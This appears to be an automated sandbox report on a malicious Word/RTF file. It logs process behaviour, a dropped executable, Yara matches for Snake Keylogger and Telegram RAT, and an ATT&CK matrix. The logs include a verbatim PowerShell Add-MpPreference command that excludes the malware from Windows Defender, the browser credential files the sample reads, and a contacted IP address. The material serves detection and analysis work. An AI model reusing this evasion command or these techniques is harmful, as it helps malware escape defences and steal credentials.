                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 320000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 5650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 6A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 7A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2358Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5508Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeWindow / User API: threadDelayed 9678Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3392Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3760Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3800Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3800Thread sleep time: -6600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3804Thread sleep count: 114 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exe TID: 3804Thread sleep count: 9678 > 30Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3880Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00309A4A LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,7_2_00309A4A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory written: C:\Users\user\AppData\Roaming\obisfd.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeQueries volume information: C:\Users\user\AppData\Roaming\obisfd.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeQueries volume information: C:\Users\user\AppData\Roaming\obisfd.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		14
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate                		NTDS1
                Process Discovery                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets31
                Virtualization/Sandbox Evasion                		SSH1
                Input Capture                		24
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync1
                Remote System Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528051 Sample: PO.doc Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 41 Initial sample is an obfuscated RTF file 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 24 other signatures 2->47 8 WINWORD.EXE 291 18 2->8         started        process3 file4 27 C:\Users\user\Desktop\~$PO.doc, data 8->27 dropped 11 EQNEDT32.EXE 11 8->11         started        16 EQNEDT32.EXE 8->16         started        process5 dnsIp6 39 154.216.19.160, 49163, 80 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 11->39 29 C:\Users\user\AppData\Roaming\obisfd.exe, PE32 11->29 dropped 31 C:\Users\user\...\6FfzLi8FyhIIqWu[1].exe, PE32 11->31 dropped 65 Office equation editor establishes network connection 11->65 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->67 18 obisfd.exe 3 11->18         started        file7 signatures8 process9 signatures10 49 Machine Learning detection for dropped file 18->49 51 Adds a directory exclusion to Windows Defender 18->51 53 Injects a PE file into a foreign processes 18->53 21 obisfd.exe 12 